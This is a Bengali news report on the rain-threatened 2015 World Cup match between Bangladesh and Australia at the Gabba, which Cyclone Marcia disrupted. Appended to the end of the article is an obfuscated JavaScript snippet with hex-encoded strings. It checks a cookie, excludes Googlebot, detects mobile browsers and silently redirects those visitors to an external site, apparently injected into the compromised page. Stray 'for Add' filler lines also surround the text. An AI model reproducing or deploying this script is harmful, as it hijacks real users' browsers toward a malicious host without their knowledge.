for Add
: ২১ ফেব্রুয়ারি ২০১৫, শনিবার, ১০:৩২:৫০
নিজস্ব প্রতিবেদক: কিছুক্ষণের জন্য বৃষ্টি থেমেছিল। আশা জেগেছিল কার্টেল ওভারের হলেও বাংলাদেশ-অস্ট্রেলিয়া ম্যাচটি অনুষ্ঠিত হবে। সে জন্য কাজও শুরু করে দিয়েছিল ব্রিসবেনের ভেন্যু গ্যাবার মাঠকর্মীরা; কিন্তু আশাহতই হতে হচ্ছে ক্রিকেটপ্রেমীদের। সম্ভাবনা তৈরী করে আবারও শুরু হয়েছে মুষলধারে বৃষ্টি। এবং একই সঙ্গে ম্যাচ আয়োজনের সব চেষ্টাও পণ্ড হয়ে গেলো। বোঝাই যাচ্ছে, বাংলাদেশ-অস্ট্রেলিয়া ম্যাচটি বৃষ্টিতেই ভেসে গেলো এবং শেষ পর্যন্ত পয়েন্ট ভাগাভাগি করে নিতে হবে দু’দলকে।
ম্যাচ শুরু হওয়ার কথা বাংলাদেশ সময় সকাল সাড়ে ৯টায়। আর অস্ট্রেলিয়ার সময় দুপুর ২টায়। কিন্তু ঘূর্ণিঝড় মার্সিয়ার প্রভাবে প্রচণ্ড বৃষ্টি আর ঝড়ো হাওয়ার কারণে ইতিমধ্যে সেই সময় পার হয়ে গেছে। যদিও, বাংলাদেশ সময় সকাল ১০টা আবহাওয়ার আপডেট জানাচ্ছিল, বৃষ্টি থেমেছে। গ্যাবার গ্রাউন্ডসম্যানরা নেমে পড়েছেন মাঠ তৈরীর কাজে।
খেলা যদি শেষ পর্যন্ত মাঠে গড়ায়ও, তবে সেটা হবে কার্টেল ওভারের। হতে পারে ২০ ওভারের ম্যাচও। কোন ম্যাচের জন্য যেহেতু আইসিসি কোন রিজার্ভ ডে রাখেনি, সে কারণে গ্যাবার এই ম্যাচটি যে করেই হোক আয়োজনের চেষ্টা করছে আইসিসি। সে হিসেবেই কার্টেল ওভারের জন্য হলেও ম্যাচটি আয়োজনের চেষ্টা অব্যাহত রয়েছে।
অস্ট্রেলিয়ার বিপক্ষে মাশরাফিদের ম্যাচটি দেখার জন্য টিভি সেটের সামনে বসে এখন পুরো বাংলাদেশের ক্রিকেটপ্রেমীরা। কিন্তু সর্বনাশা ঘুর্ণিঝড় ‘মার্সিয়া’ ভাসিয়ে নিয়ে যাচ্ছে বিশ্বকাপে বাংলাদেশের গুরুত্বপূর্ণ এই ম্যাচটিকে। টানা কয়েকদিন মূষলধারে বৃষ্টির কারণে, ম্যাচটি মাঠে গড়াবে কি না, তা নিয়ে সংশয় দেখা যাচ্ছে।
যদিও, ইএসপিএন ক্রিকইনফো আবহাওয়া আপডেট জানাতে গিয়ে জানিয়েছে, বৃষ্টি থেমেছে ইতিমধ্যে। গ্রাউন্ড স্টাফরা ইতিমধ্যে মাঠে নেমে পড়েছে। তারা পানি নিষ্কাষনের ব্যবস্থা করছে এবং চার পাশে বিজ্ঞাপনের বোর্ডগুলো বসানোর কাজ করছে। যদিও ম্যাচ ঠিক ঠাক মাঠে গড়ানো নিয়ে শঙ্কা এখনও রয়ে গেছে। সত্যি সত্যি ম্যাচ অনুষ্ঠিত হবে কি না সে জন্য অপেক্ষা করা হবে স্থানীয় সময় সন্ধ্যা সাড়ে ৬টা (বাংলাদেশ সময় দুপুর সাড়ে ১২টা) পর্যন্ত।
ম্যাচ যদি অনুষ্ঠিত হয়ই, তাহলে কার্টেল ওভারে অনুষ্ঠিত হওয়ার সম্ভাবনা রয়েছে। সেটা হতে পারে ২০ ওভারেরও। তাহলে দর্শকরা একই সঙ্গে ওয়ানডে এবং টি২০- দুটোরই মজা পেয়ে যাবেন।
দুই অধিনায়ক মাইকেল ক্লার্ক আর মাশরাফি বিন মর্তুজা টস করতে নামার কথা স্থানীয় সময় দুপুর দেড়টায়। ম্যাচ শুরু হওয়ার কথা দুপুর ২টা (বাংলাদেশ সময় সকাল সাড়ে ৯টায়) কিন্তু বৃষ্টি কিছুটা থামলেও, টস করতে নামতে পারেননি তারা। টসের কয়েন নিক্ষেপের সময় পিছিয়ে দেওয়া হয়েছে ইতিমধ্যে।
অস্ট্রেলিয়ায় বিশ্বকাপের খেলাগুলো দেখানোর স্বত্ত্ব পেয়েছে চ্যানেল নাইন। ব্রিসেবেনে বাংলাদেশ-অস্ট্রেলিয়া ম্যাচটি দেখানোর জন্য তারা পুরোপুরি প্রস্তুত। কিন্তু বৃষ্টির কারণে ম্যাচ শুরু হতে বিলম্ব হওয়ায় তারাও দর্শকদের আর হতাশ করতে চাইছে না। দর্শকদের বিনোদনের জন্য ‘রেইন ডিলে’ মুভি দেখানো শুরু করে দিয়েছে।var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}
For add
For add
For add
For add
for Add